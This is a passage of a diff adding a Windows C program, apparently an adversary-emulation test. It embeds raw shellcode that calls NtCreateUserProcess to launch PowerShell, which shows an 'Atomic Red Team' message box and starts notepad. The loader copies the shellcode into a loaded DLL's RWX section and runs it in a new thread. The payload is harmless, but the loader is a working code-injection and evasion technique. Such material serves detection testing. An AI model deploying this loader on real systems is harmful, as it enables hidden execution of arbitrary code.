0x00,0x00,0x48,0x8b,0x8d,0x40,0x03,0x00,0x00,0x48, + 0x0f,0xbf,0x04,0x41,0x48,0x8b,0x8d,0x48,0x03,0x00, + 0x00,0x48,0x63,0x04,0x81,0x48,0x8b,0x8d,0x18,0x03, + 0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89, + 0x85,0x50,0x03,0x00,0x00,0x48,0x8b,0x85,0x18,0x03, + 0x00,0x00,0x48,0x89,0x85,0x58,0x03,0x00,0x00,0x48, + 0x8b,0x85,0xf8,0x02,0x00,0x00,0x48,0x89,0x85,0x60, + 0x03,0x00,0x00,0x48,0x8b,0x85,0x60,0x03,0x00,0x00, + 0xc7,0x80,0x14,0x01,0x00,0x00,0xff,0xff,0xff,0xff, + 0x48,0x8b,0x85,0xf8,0x02,0x00,0x00,0x48,0x8b,0x40, + 0x30,0x48,0x89,0x85,0x68,0x03,0x00,0x00,0x48,0xb8, + 0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x48,0x89, + 0x45,0x10,0x48,0xc7,0x45,0x18,0x61,0x72,0x79,0x41, + 0x48,0x8d,0x55,0x10,0x48,0x8b,0x8d,0x58,0x03,0x00, + 0x00,0xff,0x95,0x50,0x03,0x00,0x00,0x48,0x89,0x85, + 0x70,0x03,0x00,0x00,0x48,0xb8,0x52,0x74,0x6c,0x41, + 0x6c,0x6c,0x6f,0x63,0x48,0x89,0x45,0x10,0x48,0xb8, + 0x61,0x74,0x65,0x48,0x65,0x61,0x70,0x00,0x48,0x89, + 0x45,0x18,0x48,0x8d,0x55,0x10,0x48,0x8b,0x8d,0x68, + 0x03,0x00,0x00,0xff,0x95,0x50,0x03,0x00,0x00,0x48, + 0x89,0x85,0x78,0x03,0x00,0x00,0x48,0xb8,0x52,0x74, + 0x6c,0x43,0x72,0x65,0x61,0x74,0x48,0x89,0x45,0x38, + 0x48,0xb8,0x65,0x50,0x72,0x6f,0x63,0x65,0x73,0x73, + 0x48,0x89,0x45,0x40,0x48,0xb8,0x50,0x61,0x72,0x61, + 0x6d,0x65,0x74,0x65,0x48,0x89,0x45,0x48,0x48,0xc7, + 0x45,0x50,0x72,0x73,0x45,0x78,0x48,0x8d,0x55,0x38, + 0x48,0x8b,0x8d,0x68,0x03,0x00,0x00,0xff,0x95,0x50, + 0x03,0x00,0x00,0x48,0x89,0x85,0x80,0x03,0x00,0x00, + 0x48,0xb8,0x4e,0x74,0x43,0x72,0x65,0x61,0x74,0x65, + 0x48,0x89,0x45,0x20,0x48,0xb8,0x55,0x73,0x65,0x72, + 0x50,0x72,0x6f,0x63,0x48,0x89,0x45,0x28,0x48,0xc7, + 0x45,0x30,0x65,0x73,0x73,0x00,0x48,0x8d,0x55,0x20, + 0x48,0x8b,0x8d,0x68,0x03,0x00,0x00,0xff,0x95,0x50, + 0x03,0x00,0x00,0x48,0x89,0x85,0x88,0x03,0x00,0x00, + 0x48,0xb8,0x52,0x74,0x6c,0x49,0x6e,0x69,0x74,0x55, + 0x48,0x89,0x45,0x20,0x48,0xb8,0x6e,0x69,0x63,0x6f, + 0x64,0x65,0x53,0x74,0x48,0x89,0x45,0x28,0x48,0xc7, + 0x45,0x30,0x72,0x69,0x6e,0x67,0x48,0x8d,0x55,0x20, + 0x48,0x8b,0x8d,0x68,0x03,0x00,0x00,0xff,0x95,0x50, + 0x03,0x00,0x00,0x48,0x89,0x85,0x90,0x03,0x00,0x00, + 0x48,0xb8,0x5c,0x00,0x3f,0x00,0x3f,0x00,0x5c,0x00, + 0x48,0x89,0x45,0x60,0x48,0xb8,0x43,0x00,0x3a,0x00, + 0x5c,0x00,0x57,0x00,0x48,0x89,0x45,0x68,0x48,0xb8, + 0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x48,0x89, + 0x45,0x70,0x48,0xb8,0x77,0x00,0x73,0x00,0x5c,0x00, + 0x53,0x00,0x48,0x89,0x45,0x78,0x48,0xb8,0x79,0x00, + 0x73,0x00,0x74,0x00,0x65,0x00,0x48,0x89,0x85,0x80, + 0x00,0x00,0x00,0x48,0xb8,0x6d,0x00,0x33,0x00,0x32, + 0x00,0x5c,0x00,0x48,0x89,0x85,0x88,0x00,0x00,0x00, + 0x48,0xb8,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00, + 0x48,0x89,0x85,0x90,0x00,0x00,0x00,0x48,0xb8,0x6f, + 0x00,0x77,0x00,0x73,0x00,0x50,0x00,0x48,0x89,0x85, + 0x98,0x00,0x00,0x00,0x48,0xb8,0x6f,0x00,0x77,0x00, + 0x65,0x00,0x72,0x00,0x48,0x89,0x85,0xa0,0x00,0x00, + 0x00,0x48,0xb8,0x53,0x00,0x68,0x00,0x65,0x00,0x6c, + 0x00,0x48,0x89,0x85,0xa8,0x00,0x00,0x00,0x48,0xb8, + 0x6c,0x00,0x5c,0x00,0x76,0x00,0x31,0x00,0x48,0x89, + 0x85,0xb0,0x00,0x00,0x00,0x48,0xb8,0x2e,0x00,0x30, + 0x00,0x5c,0x00,0x70,0x00,0x48,0x89,0x85,0xb8,0x00, + 0x00,0x00,0x48,0xb8,0x6f,0x00,0x77,0x00,0x65,0x00, + 0x72,0x00,0x48,0x89,0x85,0xc0,0x00,0x00,0x00,0x48, + 0xb8,0x73,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x48, + 0x89,0x85,0xc8,0x00,0x00,0x00,0x48,0xb8,0x6c,0x00, + 0x2e,0x00,0x65,0x00,0x78,0x00,0x48,0x89,0x85,0xd0, + 0x00,0x00,0x00,0x48,0xc7,0x85,0xd8,0x00,0x00,0x00, + 0x65,0x00,0x00,0x00,0x48,0x8d,0x55,0x60,0x48,0x8d, + 0x8d,0x98,0x03,0x00,0x00,0xff,0x95,0x90,0x03,0x00, + 0x00,0x48,0xb8,0x5c,0x00,0x3f,0x00,0x3f,0x00,0x5c, + 0x00,0x48,0x89,0x85,0xe0,0x00,0x00,0x00,0x48,0xb8, + 0x43,0x00,0x3a,0x00,0x5c,0x00,0x57,0x00,0x48,0x89, + 0x85,0xe8,0x00,0x00,0x00,0x48,0xb8,0x69,0x00,0x6e, + 0x00,0x64,0x00,0x6f,0x00,0x48,0x89,0x85,0xf0,0x00, + 0x00,0x00,0x48,0xb8,0x77,0x00,0x73,0x00,0x5c,0x00, + 0x53,0x00,0x48,0x89,0x85,0xf8,0x00,0x00,0x00,0x48, + 0xb8,0x79,0x00,0x73,0x00,0x74,0x00,0x65,0x00,0x48, + 0x89,0x85,0x00,0x01,0x00,0x00,0x48,0xb8,0x6d,0x00, + 0x33,0x00,0x32,0x00,0x5c,0x00,0x48,0x89,0x85,0x08, + 0x01,0x00,0x00,0x48,0xb8,0x57,0x00,0x69,0x00,0x6e, + 0x00,0x64,0x00,0x48,0x89,0x85,0x10,0x01,0x00,0x00, + 0x48,0xb8,0x6f,0x00,0x77,0x00,0x73,0x00,0x50,0x00, + 0x48,0x89,0x85,0x18,0x01,0x00,0x00,0x48,0xb8,0x6f, + 0x00,0x77,0x00,0x65,0x00,0x72,0x00,0x48,0x89,0x85, + 0x20,0x01,0x00,0x00,0x48,0xb8,0x53,0x00,0x68,0x00, + 0x65,0x00,0x6c,0x00,0x48,0x89,0x85,0x28,0x01,0x00, + 0x00,0x48,0xb8,0x6c,0x00,0x5c,0x00,0x76,0x00,0x31, + 0x00,0x48,0x89,0x85,0x30,0x01,0x00,0x00,0x48,0xb8, + 0x2e,0x00,0x30,0x00,0x5c,0x00,0x70,0x00,0x48,0x89, + 0x85,0x38,0x01,0x00,0x00,0x48,0xb8,0x6f,0x00,0x77, + 0x00,0x65,0x00,0x72,0x00,0x48,0x89,0x85,0x40,0x01, + 0x00,0x00,0x48,0xb8,0x73,0x00,0x68,0x00,0x65,0x00, + 0x6c,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0x48, + 0xb8,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x48, + 0x89,0x85,0x50,0x01,0x00,0x00,0x48,0xb8,0x65,0x00, + 0x20,0x00,0x2d,0x00,0x43,0x00,0x48,0x89,0x85,0x58, + 0x01,0x00,0x00,0x48,0xb8,0x6f,0x00,0x6d,0x00,0x6d, + 0x00,0x61,0x00,0x48,0x89,0x85,0x60,0x01,0x00,0x00, + 0x48,0xb8,0x6e,0x00,0x64,0x00,0x20,0x00,0x22,0x00, + 0x48,0x89,0x85,0x68,0x01,0x00,0x00,0x48,0xb8,0x41, + 0x00,0x64,0x00,0x64,0x00,0x2d,0x00,0x48,0x89,0x85, + 0x70,0x01,0x00,0x00,0x48,0xb8,0x54,0x00,0x79,0x00, + 0x70,0x00,0x65,0x00,0x48,0x89,0x85,0x78,0x01,0x00, + 0x00,0x48,0xb8,0x20,0x00,0x2d,0x00,0x41,0x00,0x73, + 0x00,0x48,0x89,0x85,0x80,0x01,0x00,0x00,0x48,0xb8, + 0x73,0x00,0x65,0x00,0x6d,0x00,0x62,0x00,0x48,0x89, + 0x85,0x88,0x01,0x00,0x00,0x48,0xb8,0x6c,0x00,0x79, + 0x00,0x4e,0x00,0x61,0x00,0x48,0x89,0x85,0x90,0x01, + 0x00,0x00,0x48,0xb8,0x6d,0x00,0x65,0x00,0x20,0x00, + 0x50,0x00,0x48,0x89,0x85,0x98,0x01,0x00,0x00,0x48, + 0xb8,0x72,0x00,0x65,0x00,0x73,0x00,0x65,0x00,0x48, + 0x89,0x85,0xa0,0x01,0x00,0x00,0x48,0xb8,0x6e,0x00, + 0x74,0x00,0x61,0x00,0x74,0x00,0x48,0x89,0x85,0xa8, + 0x01,0x00,0x00,0x48,0xb8,0x69,0x00,0x6f,0x00,0x6e, + 0x00,0x46,0x00,0x48,0x89,0x85,0xb0,0x01,0x00,0x00, + 0x48,0xb8,0x72,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, + 0x48,0x89,0x85,0xb8,0x01,0x00,0x00,0x48,0xb8,0x77, + 0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x48,0x89,0x85, + 0xc0,0x01,0x00,0x00,0x48,0xb8,0x3b,0x00,0x20,0x00, + 0x5b,0x00,0x53,0x00,0x48,0x89,0x85,0xc8,0x01,0x00, + 0x00,0x48,0xb8,0x79,0x00,0x73,0x00,0x74,0x00,0x65, + 0x00,0x48,0x89,0x85,0xd0,0x01,0x00,0x00,0x48,0xb8, + 0x6d,0x00,0x2e,0x00,0x57,0x00,0x69,0x00,0x48,0x89, + 0x85,0xd8,0x01,0x00,0x00,0x48,0xb8,0x6e,0x00,0x64, + 0x00,0x6f,0x00,0x77,0x00,0x48,0x89,0x85,0xe0,0x01, + 0x00,0x00,0x48,0xb8,0x73,0x00,0x2e,0x00,0x4d,0x00, + 0x65,0x00,0x48,0x89,0x85,0xe8,0x01,0x00,0x00,0x48, + 0xb8,0x73,0x00,0x73,0x00,0x61,0x00,0x67,0x00,0x48, + 0x89,0x85,0xf0,0x01,0x00,0x00,0x48,0xb8,0x65,0x00, + 0x42,0x00,0x6f,0x00,0x78,0x00,0x48,0x89,0x85,0xf8, + 0x01,0x00,0x00,0x48,0xb8,0x5d,0x00,0x3a,0x00,0x3a, + 0x00,0x53,0x00,0x48,0x89,0x85,0x00,0x02,0x00,0x00, + 0x48,0xb8,0x68,0x00,0x6f,0x00,0x77,0x00,0x28,0x00, + 0x48,0x89,0x85,0x08,0x02,0x00,0x00,0x48,0xb8,0x27, + 0x00,0x41,0x00,0x74,0x00,0x6f,0x00,0x48,0x89,0x85, + 0x10,0x02,0x00,0x00,0x48,0xb8,0x6d,0x00,0x69,0x00, + 0x63,0x00,0x20,0x00,0x48,0x89,0x85,0x18,0x02,0x00, + 0x00,0x48,0xb8,0x52,0x00,0x65,0x00,0x64,0x00,0x20, + 0x00,0x48,0x89,0x85,0x20,0x02,0x00,0x00,0x48,0xb8, + 0x54,0x00,0x65,0x00,0x61,0x00,0x6d,0x00,0x48,0x89, + 0x85,0x28,0x02,0x00,0x00,0x48,0xb8,0x27,0x00,0x2c, + 0x00,0x20,0x00,0x27,0x00,0x48,0x89,0x85,0x30,0x02, + 0x00,0x00,0x48,0xb8,0x57,0x00,0x61,0x00,0x72,0x00, + 0x6e,0x00,0x48,0x89,0x85,0x38,0x02,0x00,0x00,0x48, + 0xb8,0x69,0x00,0x6e,0x00,0x67,0x00,0x27,0x00,0x48, + 0x89,0x85,0x40,0x02,0x00,0x00,0x48,0xb8,0x2c,0x00, + 0x20,0x00,0x27,0x00,0x4f,0x00,0x48,0x89,0x85,0x48, + 0x02,0x00,0x00,0x48,0xb8,0x4b,0x00,0x27,0x00,0x2c, + 0x00,0x20,0x00,0x48,0x89,0x85,0x50,0x02,0x00,0x00, + 0x48,0xb8,0x27,0x00,0x57,0x00,0x61,0x00,0x72,0x00, + 0x48,0x89,0x85,0x58,0x02,0x00,0x00,0x48,0xb8,0x6e, + 0x00,0x69,0x00,0x6e,0x00,0x67,0x00,0x48,0x89,0x85, + 0x60,0x02,0x00,0x00,0x48,0xb8,0x27,0x00,0x29,0x00, + 0x3b,0x00,0x20,0x00,0x48,0x89,0x85,0x68,0x02,0x00, + 0x00,0x48,0xb8,0x53,0x00,0x74,0x00,0x61,0x00,0x72, + 0x00,0x48,0x89,0x85,0x70,0x02,0x00,0x00,0x48,0xb8, + 0x74,0x00,0x2d,0x00,0x50,0x00,0x72,0x00,0x48,0x89, + 0x85,0x78,0x02,0x00,0x00,0x48,0xb8,0x6f,0x00,0x63, + 0x00,0x65,0x00,0x73,0x00,0x48,0x89,0x85,0x80,0x02, + 0x00,0x00,0x48,0xb8,0x73,0x00,0x20,0x00,0x27,0x00, + 0x6e,0x00,0x48,0x89,0x85,0x88,0x02,0x00,0x00,0x48, + 0xb8,0x6f,0x00,0x74,0x00,0x65,0x00,0x70,0x00,0x48, + 0x89,0x85,0x90,0x02,0x00,0x00,0x48,0xb8,0x61,0x00, + 0x64,0x00,0x2e,0x00,0x65,0x00,0x48,0x89,0x85,0x98, + 0x02,0x00,0x00,0x48,0xb8,0x78,0x00,0x65,0x00,0x27, + 0x00,0x22,0x00,0x48,0x89,0x85,0xa0,0x02,0x00,0x00, + 0x48,0x8d,0x95,0xe0,0x00,0x00,0x00,0x48,0x8d,0x8d, + 0xa8,0x03,0x00,0x00,0xff,0x95,0x90,0x03,0x00,0x00, + 0x48,0xc7,0x85,0xb8,0x03,0x00,0x00,0x00,0x00,0x00, + 0x00,0xc7,0x44,0x24,0x50,0x01,0x00,0x00,0x00,0x48, + 0xc7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0x48,0xc7, + 0x44,0x24,0x40,0x00,0x00,0x00,0x00,0x48,0xc7,0x44, + 0x24,0x38,0x00,0x00,0x00,0x00,0x48,0xc7,0x44,0x24, + 0x30,0x00,0x00,0x00,0x00,0x48,0xc7,0x44,0x24,0x28, + 0x00,0x00,0x00,0x00,0x48,0x8d,0x85,0xa8,0x03,0x00, + 0x00,0x48,0x89,0x44,0x24,0x20,0x45,0x33,0xc9,0x45, + 0x33,0xc0,0x48,0x8d,0x95,0x98,0x03,0x00,0x00,0x48, + 0x8d,0x8d,0xb8,0x03,0x00,0x00,0xff,0x95,0x80,0x03, + 0x00,0x00,0x48,0x8d,0x85,0xc0,0x03,0x00,0x00,0x48, + 0x8b,0xf8,0x33,0xc0,0xb9,0x58,0x00,0x00,0x00,0xf3, + 0xaa,0x48,0xc7,0x85,0xc0,0x03,0x00,0x00,0x58,0x00, + 0x00,0x00,0xc7,0x85,0xc8,0x03,0x00,0x00,0x00,0x00, + 0x00,0x00,0xb8,0x08,0x00,0x00,0x00,0x48,0x6b,0xc0, + 0x01,0x41,0xb8,0x20,0x00,0x00,0x00,0xba,0x08,0x00, + 0x00,0x00,0x48,0x8b,0x4d,0x00,0x48,0x8b,0x4c,0x01, + 0x28,0xff,0x95,0x78,0x03,0x00,0x00,0x48,0x89,0x85, + 0x20,0x04,0x00,0x00,0x48,0x8b,0x85,0x20,0x04,0x00, + 0x00,0x48,0xc7,0x00,0x28,0x00,0x00,0x00,0xb8,0x20, + 0x00,0x00,0x00,0x48,0x6b,0xc0,0x00,0x48,0x8b,0x8d, + 0x20,0x04,0x00,0x00,0xc7,0x44,0x01,0x08,0x05,0x00, + 0x02,0x00,0xb8,0x20,0x00,0x00,0x00,0x48,0x6b,0xc0, + 0x00,0x0f,0xb7,0x8d,0x98,0x03,0x00,0x00,0x48,0x8b, + 0x95,0x20,0x04,0x00,0x00,0x48,0x89,0x4c,0x02,0x10, + 0xb8,0x20,0x00,0x00,0x00,0x48,0x6b,0xc0,0x00,0x48, + 0x8b,0x8d,0x20,0x04,0x00,0x00,0x48,0x8b,0x95,0xa0, + 0x03,0x00,0x00,0x48,0x89,0x54,0x01,0x18,0x48,0xc7, + 0x85,0x30,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x48, + 0x8b,0x85,0x20,0x04,0x00,0x00,0x48,0x89,0x44,0x24, + 0x50,0x48,0x8d,0x85,0xc0,0x03,0x00,0x00,0x48,0x89, + 0x44,0x24,0x48,0x48,0x8b,0x85,0xb8,0x03,0x00,0x00, + 0x48,0x89,0x44,0x24,0x40,0xc7,0x44,0x24,0x38,0x00, + 0x00,0x00,0x00,0xc7,0x44,0x24,0x30,0x00,0x00,0x00, + 0x00,0x48,0xc7,0x44,0x24,0x28,0x00,0x00,0x00,0x00, + 0x48,0xc7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41, + 0xb9,0xff,0xff,0x1f,0x00,0x41,0xb8,0xff,0xff,0x1f, + 0x00,0x48,0x8d,0x95,0x30,0x04,0x00,0x00,0x48,0x8d, + 0x8d,0x28,0x04,0x00,0x00,0xff,0x95,0x88,0x03,0x00, + 0x00,0x89,0x85,0x38,0x04,0x00,0x00,0x48,0xb8,0x4e, + 0x74,0x53,0x75,0x73,0x70,0x65,0x6e,0x48,0x89,0x45, + 0x10,0x48,0xb8,0x64,0x54,0x68,0x72,0x65,0x61,0x64, + 0x00,0x48,0x89,0x45,0x18,0x48,0x8d,0x55,0x10,0x48, + 0x8b,0x8d,0x68,0x03,0x00,0x00,0xff,0x95,0x50,0x03, + 0x00,0x00,0x48,0x89,0x85,0x40,0x04,0x00,0x00,0x33, + 0xd2,0x48,0xc7,0xc1,0xfe,0xff,0xff,0xff,0xff,0x95, + 0x40,0x04,0x00,0x00,0x48,0x8d,0xa5,0x18,0x05,0x00, + 0x00,0x5f,0x5d,0xc3 + }; + +// Define the prototype for RtlCopyMemory +typedef VOID (NTAPI *pfnRtlCopyMemory)(VOID UNALIGNED *Destination, const VOID UNALIGNED *Source, SIZE_T Length); + +int main(int argc, char *argv[]) { + if (argc != 3) { + printf("[+] Usage: %s <module path> <offset> \n", argv[0]); + return 1; + } + + const char* modulePath = argv[1]; + DWORD offset = (DWORD)strtol(argv[2], NULL, 0); + + HANDLE hDll = LoadLibrary(modulePath); + if (hDll == NULL) { + printf("[-] Failed to LoadLibrary: error %d\n", GetLastError()); + return 1; + } + + MODULEINFO info; + if (!GetModuleInformation((HANDLE)-1, hDll, &info, sizeof(MODULEINFO))) { + printf("[-] Failed to GetModuleInformation: error %d\n", GetLastError()); + return 1; + } + + printf("[+] Vulnerable dll base address: %p\n", info.lpBaseOfDll); + // printf("[+] DLL address: %p\n", hDll); + PVOID rwxSection = (PVOID)((ULONG_PTR)info.lpBaseOfDll + offset); + printf("[+] RWX section address: %p\n", rwxSection); + printf("[+] Shellcode address: %p\n", shellcode); + printf("[+] Shellcode size: %d\n", sizeof(shellcode)); + + // Create SectionDescriptor + SectionDescriptor descriptor = { + rwxSection, + (LPVOID)((PBYTE)rwxSection + sizeof(shellcode)) // Assuming shellcode fits within a single page and doesn't exceed the section size + }; + + // Dynamically load RtlCopyMemory from ntdll.dll + HMODULE hNtdll = GetModuleHandleA("ntdll.dll"); + if (hNtdll == NULL) { //10059 + printf("[-] GetModuleHandleA failed to load ntdll.dll: error %d\n", GetLastError()); + return 1; + } + + pfnRtlCopyMemory RtlCopyMem = (pfnRtlCopyMemory)GetProcAddress(hNtdll, "RtlCopyMemory"); + if (RtlCopyMem == NULL) { + printf("[-] GetProcAddress failed for RtlCopyMemory: error %d\n", GetLastError()); + return 1; + } + + // Use the dynamically loaded RtlCopyMemory to copy the shellcode + RtlCopyMem(rwxSection, shellcode, sizeof(shellcode)); + + // Execute the code + HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)rwxSection, NULL, 0, NULL); + if (hThread == NULL) { + printf("[-] CreateThread failed: %d\n", GetLastError()); + return 1; + } + + if (WaitForSingleObject(hThread, 5000) == WAIT_TIMEOUT) { // Wait 5 seconds + TerminateThread(hThread, 0); // Forcibly terminates the thread + printf("[+] Thread was terminated.\n"); + } + + // Get the exit code of the thread. + DWORD exitCode = 0; + if (!GetExitCodeThread(hThread, &exitCode)) { + printf("[-] GetExitCodeThread failed: %d\n", GetLastError()); + } else { + printf("[+] Thread exited with code: %lu\n", exitCode); + } + + CloseHandle(hThread); + + return 0; +} \ No newline at end of file